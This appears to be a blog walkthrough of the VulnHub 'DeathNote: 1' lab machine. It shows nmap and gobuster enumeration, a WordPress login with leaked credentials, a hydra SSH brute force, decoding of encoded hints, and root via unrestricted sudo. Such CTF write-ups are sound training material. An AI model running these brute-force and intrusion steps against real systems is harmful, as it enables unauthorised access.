VulnHub: DeathNote: 1

Al1z4deh:~# echo "Welcome"

4 min readMay 15, 2022

--

Today we will take a look at Vulnhub: DeathNote. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Network scan

Command: Command: sudo nmap -p- -sV -sC -oN nmap/open — open 192.168.0.109

Web pages

If there is such a problem when looking at the page, do it

Command: sudo nano /etc/hosts

Result

Let’s take notes of everything you need on the page. (name, weird sentence, everything we will use)

kira
light yagami
Soichiro Yagami

If we press the hint button, we will come across a sentence.

L’s comment is below. let’s note

my fav line is

iamjustic3

Gobuster

Find Site Directories

Command: Command: gobuster dir -u http://192.168.0.109 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt

Let’s look at the robots.txt extension

We found a new directory.

.jpg file may be damaged. Let’s download.

Command: wget http://deathnote.vuln/important.jpg

Command: cat important.jpg

Indicates that the password will be in the Indian button on the site. So the password is ‘iamjustic3’

The entry can also be ‘kira’ or ‘l’. Let’s check.

Wordpress

Url- http://deathnote.vuln/wordpress/wp-login.php

user: kira pass: iamjustic3

There is such a .txt file on the media page.

Url- http://deathnote.vuln/wordpress/wp-content/uploads/2021/07/notes.txt

They look like a password. Let’s mark it as pass.txt.

Let’s add them to User.txt.

kira
l
light
Soichiro

Let’s attack ssh.

Hydra

Command: hydra -L user.txt -P pass.txt ssh://192.168.0.109 -V -t 4

user- l pass- death4me

Ssh

Command: ssh l@192.168.0.109

it was brainfuck

Let’s decode

Brainfuck/Text/Ook! obfuscator - deobfuscator. Decode and encode online.

Edit description

www.splitbrain.org

The /opt folder also has hints that will be useful to us

Let’s decode

CyberChef

The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis

gchq.github.io

Kira

Command: su kira

Let’s decode in cyberchef again

Let’s look at the / var folder

Command: cd /var
Commdn: cat misa

it is toooo late for misa

let’s check the privileges

Command: sudo -l

(ALL : ALL) ALL

This means that we have authority over everything. Let’s root

Command: sudo su

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

Elman Alizadeh - Azerbaijan Architecture and Construction University - Baku, Baku, Azerbaijan |…

View Elman Alizadeh's profile on LinkedIn, the world's largest professional community. Elman has 2 jobs listed on their…

www.linkedin.com

Al1z4deh:~# echo "Welcome"

Written by Al1z4deh:~# echo "Welcome"

Al1z4deh:~# echo "eJPT, CEH, OSCP"

Help
Status
About
Careers
Press
Blog
Privacy
Terms
Text to speech
Teams